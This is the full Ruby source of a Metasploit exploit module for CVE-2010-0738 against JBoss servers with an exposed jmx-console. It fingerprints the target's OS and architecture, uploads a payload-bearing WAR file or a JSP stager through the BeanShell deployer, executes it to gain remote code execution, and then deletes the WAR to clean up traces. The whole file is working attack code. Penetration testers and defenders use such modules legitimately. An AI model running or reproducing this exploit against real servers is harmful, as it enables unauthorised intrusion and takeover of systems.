metasploit-framework/modules/exploits/multi/http/jboss_bshdeployer.rb

268 lines
7.6 KiB
Ruby

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] }
include Msf::HTTP::JBoss
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss JMX Console Beanshell Deployer WAR Upload and Deployment',
'Description' => %q{
This module can be used to install a WAR file payload on JBoss servers that have
an exposed "jmx-console" application. The payload is put on the server by
using the jboss.system:BSHDeployer\'s createScriptDeployment() method.
},
'Author' =>
[
'Patrick Hof',
'jduck',
'Konrads Smelkovs',
'h0ng10'
],
'License' => BSD_LICENSE,
'References' =>
[
[ 'CVE', '2010-0738' ], # using a VERB other than GET/POST
[ 'OSVDB', '64171' ],
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ],
],
'Privileged' => true,
'Platform' => %w{ java linux win },
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
#
# do target detection but java meter by default
# detect via /manager/serverinfo
#
[ 'Automatic (Java based)',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
} ],
#
# Platform specific targets only
#
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
},
],
[ 'Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
],
#
# Java version
#
[ 'Java Universal',
{
'Platform' => 'java',
'Arch' => ARCH_JAVA,
}
]
],
'DisclosureDate' => "Apr 26 2010",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ])
], self.class)
end
def exploit
jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
p = payload
mytarget = target
if target.name =~ /Automatic/
mytarget = auto_target
unless mytarget
fail_with(Failure::NoTarget, "Unable to automatically select a target")
end
print_status("Automatically selected target \"#{mytarget.name}\"")
else
print_status("Using manually select target \"#{mytarget.name}\"")
end
arch = mytarget.arch
# set arch/platform from the target
plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
# We must regenerate the payload in case our auto-magic changed something.
return if ((p = exploit_regenerate_payload(plat, arch)) == nil)
# Generate the WAR containing the payload
war_data = p.encoded_war({
:app_name => app_base,
:jsp_name => jsp_name,
:arch => mytarget.arch,
:platform => mytarget.platform
}).to_s
encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '')
if http_verb == 'POST'
print_status("Deploying payload...")
opts = {
:file => "#{app_base}.war",
:contents => encoded_payload
}
else
print_status("Deploying stager...")
stager_base = rand_text_alpha(8+rand(8))
stager_jsp_name = rand_text_alpha(8+rand(8))
stager_contents = stager_jsp(app_base)
opts = {
:dir => "#{stager_base}.war",
:file => "#{stager_base}.war/#{stager_jsp_name}.jsp",
:contents => Rex::Text.encode_base64(stager_contents).gsub(/\n/, '')
}
end
bsh_payload = generate_bsh(:create, opts)
package = deploy_bsh(bsh_payload)
if package.nil?
fail_with(Failure::Unknown, "Failed to deploy")
end
unless http_verb == 'POST'
# now we call the stager to deploy our real payload war
stager_uri = '/' + stager_base + '/' + stager_jsp_name + '.jsp'
payload_data = "#{rand_text_alpha(8+rand(8))}=#{Rex::Text.uri_encode(encoded_payload)}"
print_status("Calling stager #{stager_uri } to deploy final payload")
res = deploy('method' => 'POST',
'data' => payload_data,
'uri' => stager_uri)
unless res && res.code == 200
fail_with(Failure::Unknown, "Failed to deploy")
end
end
#
# EXECUTE
#
uri = '/' + app_base + '/' + jsp_name + '.jsp'
print_status("Calling JSP file with final payload...")
print_status("Executing #{uri}...")
deploy('uri' => uri, 'method' => 'GET')
#
# DELETE
#
# The WAR can only be removed by physically deleting it, otherwise it
# will get redeployed after a server restart.
print_status("Undeploying #{uri} by deleting the WAR file via BSHDeployer...")
files = {}
unless http_verb == 'POST'
files[:stager_jsp_name] = "#{stager_base}.war/#{stager_jsp_name}.jsp"
files[:stager_base] = "#{stager_base}.war"
end
files[:app_base] = "#{app_base}.war"
delete_script = generate_bsh(:delete, files)
res = invoke_bsh_script(delete_script, package)
if res.nil?
print_warning("WARNING: Unable to remove WAR [No Response]")
elsif res.code < 200 || res.code >= 300
print_warning("WARNING: Unable to remove WAR [#{res.code} #{res.message}]")
end
handler
end
def auto_target
if http_verb == 'HEAD' then
print_status("Sorry, automatic target detection doesn't work with HEAD requests")
else
print_status("Attempting to automatically select a target...")
res = query_serverinfo
if not (plat = detect_platform(res))
fail_with(Failure::NoTarget, 'Unable to detect platform!')
end
if not (arch = detect_architecture(res))
fail_with(Failure::NoTarget, 'Unable to detect architecture!')
end
# see if we have a match
targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }
end
# no matching target found, use Java as fallback
java_targets = targets.select {|t| t.name =~ /^Java/ }
return java_targets[0]
end
def query_serverinfo
path = normalize_uri(target_uri.path.to_s, '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo')
res = send_request_raw(
{
'uri' => path,
'method' => http_verb
})
unless res && res.code == 200
print_error("Failed: Error requesting #{path}")
return nil
end
res
end
# Try to autodetect the target platform
def detect_platform(res)
if res && res.body =~ /<td.*?OSName.*?(Linux|FreeBSD|Windows).*?<\/td>/m
os = $1
if (os =~ /Linux/i)
return 'linux'
elsif (os =~ /FreeBSD/i)
return 'linux'
elsif (os =~ /Windows/i)
return 'win'
end
end
nil
end
# Try to autodetect the target architecture
def detect_architecture(res)
if res && res.body =~ /<td.*?OSArch.*?(x86|i386|i686|x86_64|amd64).*?<\/td>/m
arch = $1
if (arch =~ /(x86|i386|i686)/i)
return ARCH_X86
elsif (arch =~ /(x86_64|amd64)/i)
return ARCH_X86
end
end
nil
end
end